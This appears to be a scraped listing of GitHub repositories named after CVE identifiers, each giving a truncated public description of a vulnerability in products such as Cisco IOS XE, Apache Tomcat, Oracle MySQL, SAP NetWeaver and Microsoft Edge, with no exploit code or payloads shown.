**Adobe Commerce versions 2.4.3-p2 (and earlier), 2.3.7-p3 (and earlier) and 2.4.4 (and earlier) are affected by an Improper Access Control vulnerability that could result in Privilege escalation. An attacker with a low privilege account could leverage this vulnerability to perform an account takeover for a victim. Explo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34255](https://github.com/Live-Hack-CVE/CVE-2022-34255) create time: 2022-12-28T20:42:10Z

**All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Cross Site Scripting (XSS) due to improper input sanitization. An authenticated remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malici CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37063](https://github.com/Live-Hack-CVE/CVE-2022-37063) create time: 2022-12-28T20:42:06Z

**All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains the path of the SQLite users database and download it. A successfu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37062](https://github.com/Live-Hack-CVE/CVE-2022-37062) create time: 2022-12-28T20:42:02Z

**Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series firewalls are not cleared before the data frame is created. This leaks a small amount of random information from the firewall memory into the Ethernet packets. An attac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3031](https://github.com/Live-Hack-CVE/CVE-2021-3031) create time: 2022-12-28T19:56:07Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3167](https://github.com/Live-Hack-CVE/CVE-2012-3167) create time: 2022-12-28T19:51:56Z

**Unspecified vulnerability in Oracle MySQL 5.5.52 and earlier, 5.6.33 and earlier, and 5.7.15 and earlier allows remote administrators to affect confidentiality via vectors related to Server: Security: Encryption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5584](https://github.com/Live-Hack-CVE/CVE-2016-5584) create time: 2022-12-28T19:52:14Z

**The C software implementation of AES Encryption and Decryption in wolfSSL (formerly CyaSSL) before 3.9.10 makes it easier for local users to discover AES keys by leveraging cache-bank timing differences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7440](https://github.com/Live-Hack-CVE/CVE-2016-7440) create time: 2022-12-28T19:20:17Z

**Microsoft SQL Server Analysis Services in Microsoft SQL Server 2012, Microsoft SQL Server 2014, and Microsoft SQL Server 2016 allows an information disclosure vulnerability when it improperly enforces permissions, aka "Microsoft SQL Server Analysis Services Information Disclosure Vulnerability". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-8516](https://github.com/Live-Hack-CVE/CVE-2017-8516) create time: 2022-12-28T20:02:43Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Charsets). Supported versions that are affected are 5.5.53 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3243](https://github.com/Live-Hack-CVE/CVE-2017-3243) create time: 2022-12-28T19:20:10Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: InnoDB). Supported versions that are affected are 5.6.37 and earlier and 5.7.19 and earlier. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Succes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10286](https://github.com/Live-Hack-CVE/CVE-2017-10286) create time: 2022-12-28T19:19:56Z

**Puma is a concurrent HTTP 1.1 server for Ruby/Rack applications. The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29509](https://github.com/Live-Hack-CVE/CVE-2021-29509) create time: 2022-12-28T19:57:57Z

**A remote code execution vulnerability exists in Xterm.js when the component mishandles special characters, aka "Xterm Remote Code Execution Vulnerability." This affects xterm.js. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0542](https://github.com/Live-Hack-CVE/CVE-2019-0542) create time: 2022-12-28T19:54:02Z

**A vulnerability in the CLI of Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitt CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16011](https://github.com/Live-Hack-CVE/CVE-2019-16011) create time: 2022-12-28T19:51:35Z

**An issue was discovered in OpenStack Nova before 17.0.12, 18.x before 18.2.2, and 19.x before 19.0.2. If an API request from an authenticated user ends in a fault condition due to an external exception, details of the underlying environment may be leaked in the response, and could include sensitive configuration or oth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14433](https://github.com/Live-Hack-CVE/CVE-2019-14433) create time: 2022-12-28T19:20:14Z

**A flaw was found in Keycloak Gatekeeper (Louketo). The logout endpoint can be abused to redirect logged-in users to arbitrary web pages. Affected versions of Keycloak Gatekeeper (Louketo): 6.0.1, 7.0.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1723](https://github.com/Live-Hack-CVE/CVE-2020-1723) create time: 2022-12-28T20:02:39Z

**Information Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Ap CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30638](https://github.com/Live-Hack-CVE/CVE-2021-30638) create time: 2022-12-28T19:57:46Z

**An Improper Access Control Privilege Escalation Vulnerability was discovered in the User Setting of Orion Platform version 2020.2.5. It allows a guest user to elevate privileges to the Administrator using this vulnerability. Authentication is required to exploit the vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35213](https://github.com/Live-Hack-CVE/CVE-2021-35213) create time: 2022-12-28T19:56:59Z

**A vulnerability in the RESTCONF and NETCONF-YANG access control list (ACL) function of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload. The vulnerability is due to incorrect processing of the ACL that is tied to the RESTCONF or NETCONF-YANG feature. An attacker could CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3407](https://github.com/Live-Hack-CVE/CVE-2020-3407) create time: 2022-12-28T19:51:52Z

**A vulnerability in the PROFINET feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause an affected device to crash and reload, resulting in a denial of service (DoS) condition on the device. The vulnerability is due to insufficient processing logic for crafted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3409](https://github.com/Live-Hack-CVE/CVE-2020-3409) create time: 2022-12-28T19:51:49Z

**A vulnerability in the CLI of Cisco IOS XE Software could allow an authenticated, local attacker to inject a command to the underlying operating system that will execute with root privileges upon the next reboot of the device. The authenticated user must have privileged EXEC permissions on the device. The vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3403](https://github.com/Live-Hack-CVE/CVE-2020-3403) create time: 2022-12-28T19:51:45Z

**A vulnerability in the Split DNS feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability occurs because the regular expression (regex) engine that is used with the S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3408](https://github.com/Live-Hack-CVE/CVE-2020-3408) create time: 2022-12-28T19:51:42Z

**Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass the configured file policies on an affected system. The vulnerability is due to errors in how the Snort detection engine handles specific HTTP responses. An attacker could CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3315](https://github.com/Live-Hack-CVE/CVE-2020-3315) create time: 2022-12-28T19:51:39Z

**Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has an unauthenticated update_all_realm_license API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15341](https://github.com/Live-Hack-CVE/CVE-2020-15341) create time: 2022-12-28T19:15:54Z

**The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25329](https://github.com/Live-Hack-CVE/CVE-2021-25329) create time: 2022-12-28T20:02:36Z

**Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33037](https://github.com/Live-Hack-CVE/CVE-2021-33037) create time: 2022-12-28T20:02:32Z

**A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30640](https://github.com/Live-Hack-CVE/CVE-2021-30640) create time: 2022-12-28T20:02:29Z

**A vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O erro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30639](https://github.com/Live-Hack-CVE/CVE-2021-30639) create time: 2022-12-28T20:02:25Z

**The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a mem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42340](https://github.com/Live-Hack-CVE/CVE-2021-42340) create time: 2022-12-28T20:02:20Z

**openwhyd is vulnerable to Improper Authorization CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3837](https://github.com/Live-Hack-CVE/CVE-2021-3837) create time: 2022-12-28T20:00:59Z

**Apache James prior to release 3.6.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. This can result in Man-in -the-middle command injection attacks, leading potentially to leakage of sensible information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38542](https://github.com/Live-Hack-CVE/CVE-2021-38542) create time: 2022-12-28T20:00:55Z

**Mattermost 6.1 and earlier fails to sufficiently validate permissions while viewing archived channels, which allows authenticated users to view contents of archived channels even when this is denied by system administrators by directly accessing the APIs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37864](https://github.com/Live-Hack-CVE/CVE-2021-37864) create time: 2022-12-28T20:00:51Z

**The Dell EMC Virtual Appliances before 9.2.2.2 contain undocumented user accounts. A local malicious user may potentially exploit this vulnerability to get privileged access to the virtual appliance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36339](https://github.com/Live-Hack-CVE/CVE-2021-36339) create time: 2022-12-28T20:00:48Z

**Fresenius Kabi Agilia SP MC WiFi vD25 and prior has a default configuration page accessible without authentication. An attacker may use this functionality to change the exposed configuration values such as network settings. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33843](https://github.com/Live-Hack-CVE/CVE-2021-33843) create time: 2022-12-28T20:00:45Z

**Authentication Bypass by Primary Weakness in GitHub repository adodb/adodb prior to 5.20.21. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3850](https://github.com/Live-Hack-CVE/CVE-2021-3850) create time: 2022-12-28T20:00:41Z

**This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of multiple NETGEAR routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from incor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34865](https://github.com/Live-Hack-CVE/CVE-2021-34865) create time: 2022-12-28T20:00:37Z

**Improper Privilege Management in GitHub repository chatwoot/chatwoot prior to v2.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3813](https://github.com/Live-Hack-CVE/CVE-2021-3813) create time: 2022-12-28T20:00:34Z

**A Improper Access Control vulnerability in SUSE Rancher allows remote attackers impersonate arbitrary users. This issue affects: SUSE Rancher Rancher versions prior to 2.5.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36776](https://github.com/Live-Hack-CVE/CVE-2021-36776) create time: 2022-12-28T20:00:30Z

**a Improper Access Control vulnerability in SUSE Rancher allows users to keep privileges that should have been revoked. This issue affects: SUSE Rancher Rancher versions prior to 2.4.18; Rancher versions prior to 2.5.12; Rancher versions prior to 2.6.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36775](https://github.com/Live-Hack-CVE/CVE-2021-36775) create time: 2022-12-28T20:00:26Z

**An authentication bypass vulnerability was discovered in the web interface of the Lenovo Fan Power Controller2 (FPC2) and Lenovo System Management Module (SMM) firmware that could allow an unauthenticated attacker to execute commands on the SMM and FPC2. SMM2 is not affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3849](https://github.com/Live-Hack-CVE/CVE-2021-3849) create time: 2022-12-28T20:00:23Z

**RTI Connext DDS Professional and Connext DDS Secure Versions 4.2.x to 6.1.0 are vulnerable to a stack-based buffer overflow, which may allow a local attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38427](https://github.com/Live-Hack-CVE/CVE-2021-38427) create time: 2022-12-28T20:00:19Z

**mySCADA myPRO versions prior to 8.20.0 does not restrict unauthorized read access to sensitive system information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33013](https://github.com/Live-Hack-CVE/CVE-2021-33013) create time: 2022-12-28T20:00:16Z

**This broken access control vulnerability pertains specifically to a domain admin who can access configuration & user data of other domains which they should not have access to. Please note the admin is unable to modify the data (read only operation). This UAC issue leads to a data leak to unauthorized users for a domai CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35249](https://github.com/Live-Hack-CVE/CVE-2021-35249) create time: 2022-12-28T20:00:12Z

**A vulnerability in the user profile update component found in the ~/src/Classes/EditUserProfile.php file of the ProfilePress WordPress plugin made it possible for users to escalate their privileges to that of an administrator while editing their profile. This issue affects versions 3.0.0 - 3.1.3. . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34622](https://github.com/Live-Hack-CVE/CVE-2021-34622) create time: 2022-12-28T20:00:03Z

**A vulnerability in the deleteCustomType function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to delete custom extensions added by administrators. This issue affects versions 2.2.3 and prior. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34626](https://github.com/Live-Hack-CVE/CVE-2021-34626) create time: 2022-12-28T19:59:59Z

**A vulnerability in the getSelectedMimeTypesByRole function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to view custom extensions added by administrators. This issue affects versions 2.2.3 and prior. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34627](https://github.com/Live-Hack-CVE/CVE-2021-34627) create time: 2022-12-28T19:59:56Z

**OpenVPN 3 Core Library version 3.6 and 3.6.1 allows a man-in-the-middle attacker to bypass the certificate authentication by issuing an unrelated server certificate using the same hostname found in the verify-x509-name option in a client configuration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3547](https://github.com/Live-Hack-CVE/CVE-2021-3547) create time: 2022-12-28T19:59:27Z

**A vulnerability has been identified in JT Utilities (All versions < V13.0.2.0). When parsing specially crafted JT files, a hash function is called with an incorrect argument leading the application to crash. An attacker could leverage this vulnerability to cause a Denial-of-Service condition in the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33713](https://github.com/Live-Hack-CVE/CVE-2021-33713) create time: 2022-12-28T19:59:24Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Solid Edge SE2021 (All Versions < SE2021MP5), Teamcenter Visualization (All versions < V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34326](https://github.com/Live-Hack-CVE/CVE-2021-34326) create time: 2022-12-28T19:59:20Z

**A vulnerability has been identified in JT2Go (All versions < V13.2), Teamcenter Visualization (All versions < V13.2). The Tiff_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34307](https://github.com/Live-Hack-CVE/CVE-2021-34307) create time: 2022-12-28T19:59:17Z

**For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34429](https://github.com/Live-Hack-CVE/CVE-2021-34429) create time: 2022-12-28T19:59:13Z

**NAVER Toolbar before 4.0.30.323 allows remote attackers to execute arbitrary code via a crafted upgrade.xml file. Special characters in filename parameter can be the cause of bypassing code signing check function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33592](https://github.com/Live-Hack-CVE/CVE-2021-33592) create time: 2022-12-28T19:59:10Z

**The management page of the Orca HCM digital learning platform does not perform identity verification, which allows remote attackers to execute the management function without logging in, access members’ information, modify and delete the courses in system, thus causing users fail to access the learning content. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35964](https://github.com/Live-Hack-CVE/CVE-2021-35964) create time: 2022-12-28T19:59:06Z

**The Orca HCM digital learning platform uses a weak factory default administrator password, which is hard-coded in the source code of the webpage in plain text, thus remote attackers can obtain administrator’s privilege without logging in. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35965](https://github.com/Live-Hack-CVE/CVE-2021-35965) create time: 2022-12-28T19:59:02Z

**Due to improper error handling in SAP NetWeaver Application Server Java - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, an attacker could submit multiple HTTP server requests resulting in errors, such that it consumes the memory buffer. This could result in system CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22533](https://github.com/Live-Hack-CVE/CVE-2022-22533) create time: 2022-12-28T20:02:17Z

**SAP Adaptive Server Enterprise (ASE) - version 16.0, installation makes an entry in the system PATH environment variable in Windows platform which, under certain conditions, allows a Standard User to execute malicious Windows binaries which may lead to privilege escalation on the local system. The issue is with the ASE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22528](https://github.com/Live-Hack-CVE/CVE-2022-22528) create time: 2022-12-28T20:02:13Z

**SAP ERP HCM Portugal - versions 600, 604, 608, does not perform necessary authorization checks for a report that reads the payroll data of employees in a certain area. Since the affected report only reads the payroll information, the attacker can neither modify any information nor cause availability impacts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22535](https://github.com/Live-Hack-CVE/CVE-2022-22535) create time: 2022-12-28T20:01:39Z

**Due to insufficient encoding of user input, SAP NetWeaver allows an unauthenticated attacker to inject code that may expose sensitive data like user ID and password. These endpoints are normally exposed over the network and successful exploitation can partially impact confidentiality of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22534](https://github.com/Live-Hack-CVE/CVE-2022-22534) create time: 2022-12-28T20:01:36Z

**SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22536](https://github.com/Live-Hack-CVE/CVE-2022-22536) create time: 2022-12-28T20:01:32Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26912](https://github.com/Live-Hack-CVE/CVE-2022-26912) create time: 2022-12-28T20:01:29Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26912. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26909](https://github.com/Live-Hack-CVE/CVE-2022-26909) create time: 2022-12-28T20:01:25Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26909, CVE-2022-26912. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26908](https://github.com/Live-Hack-CVE/CVE-2022-26908) create time: 2022-12-28T20:01:21Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26900](https://github.com/Live-Hack-CVE/CVE-2022-26900) create time: 2022-12-28T20:01:17Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26895](https://github.com/Live-Hack-CVE/CVE-2022-26895) create time: 2022-12-28T20:01:13Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26894](https://github.com/Live-Hack-CVE/CVE-2022-26894) create time: 2022-12-28T20:01:09Z

**Microsoft Edge (Chromium-based) Spoofing Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24523](https://github.com/Live-Hack-CVE/CVE-2022-24523) create time: 2022-12-28T20:01:06Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24475](https://github.com/Live-Hack-CVE/CVE-2022-24475) create time: 2022-12-28T20:01:03Z

**A vulnerability in the component process.php of QR Code Generator v5.2.7 allows attackers to perform directory traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24992](https://github.com/Live-Hack-CVE/CVE-2022-24992) create time: 2022-12-28T20:00:08Z

**An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary files inside the directories of connecting peers. The server chooses which files/directories are sent to the client. However, the rsync client performs insufficient validation of file names. A malicious rsync server (o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29154](https://github.com/Live-Hack-CVE/CVE-2022-29154) create time: 2022-12-28T19:59:34Z

**The Fast Flow WordPress plugin before 1.2.12 does not sanitise and escape the page parameter before outputting back in an attribute in an admin dashboard, leading to a Reflected Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1269](https://github.com/Live-Hack-CVE/CVE-2022-1269) create time: 2022-12-28T19:59:30Z

**Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33207](https://github.com/Live-Hack-CVE/CVE-2022-33207) create time: 2022-12-28T19:54:15Z

**Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33206](https://github.com/Live-Hack-CVE/CVE-2022-33206) create time: 2022-12-28T19:54:12Z

**Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33204](https://github.com/Live-Hack-CVE/CVE-2022-33204) create time: 2022-12-28T19:54:09Z

**Four OS command injection vulnerabilities exists in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33205](https://github.com/Live-Hack-CVE/CVE-2022-33205) create time: 2022-12-28T19:54:05Z

**An issue was discovered in the file-type package before 16.5.4 and 17.x before 17.1.3 for Node.js. A malformed MKV file could cause the file type detector to get caught in an infinite loop. This would make the application become unresponsive and could be used to cause a DoS attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36313](https://github.com/Live-Hack-CVE/CVE-2022-36313) create time: 2022-12-28T19:53:58Z

**AutoTrace v0.40.0 was discovered to contain a heap overflow via the ReadImage function at input-bmp.c:660. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32323](https://github.com/Live-Hack-CVE/CVE-2022-32323) create time: 2022-12-28T19:53:55Z

**AlgoSec – FireFlow Reflected Cross-Site-Scripting (RXSS) A malicious user injects JavaScript code into a parameter called IntersectudRule on the search/result.html page. The malicious user changes the request from POST to GET and sends the URL to another user (victim). JavaScript code is executed on the browser of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36783](https://github.com/Live-Hack-CVE/CVE-2022-36783) create time: 2022-12-28T19:53:48Z

**There is as reflected cross site scripting issue in Esri ArcGIS Server versions 10.9.1 and below which may allow a remote unauthorized attacker able to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the victim’s browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38195](https://github.com/Live-Hack-CVE/CVE-2022-38195) create time: 2022-12-28T19:53:44Z

**An issue was discovered in Connected Vehicle Systems Alliance (COVESA) dlt-daemon through 2.18.8. Due to a faulty DLT file parser, a crafted DLT file that crashes the process can be created. This is due to missing validation checks. There is a NULL pointer dereference, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39837](https://github.com/Live-Hack-CVE/CVE-2022-39837) create time: 2022-12-28T19:53:41Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21291](https://github.com/Live-Hack-CVE/CVE-2022-21291) create time: 2022-12-28T19:53:34Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.7.37 and prior and 8.0.28 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21427](https://github.com/Live-Hack-CVE/CVE-2022-21427) create time: 2022-12-28T19:53:30Z

**Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with administrative privileges to inject code or spawn a system root shell. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36323](https://github.com/Live-Hack-CVE/CVE-2022-36323) create time: 2022-12-28T19:53:26Z

**An issue was discovered in MediaWiki before 1.35.7, 1.36.x and 1.37.x before 1.37.3, and 1.38.x before 1.38.1. XSS can occur in configurations that allow a JavaScript payload in a username. After account creation, when it sets the page title to "Welcome" followed by the username, the username is not escaped: SpecialCre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34911](https://github.com/Live-Hack-CVE/CVE-2022-34911) create time: 2022-12-28T19:53:23Z

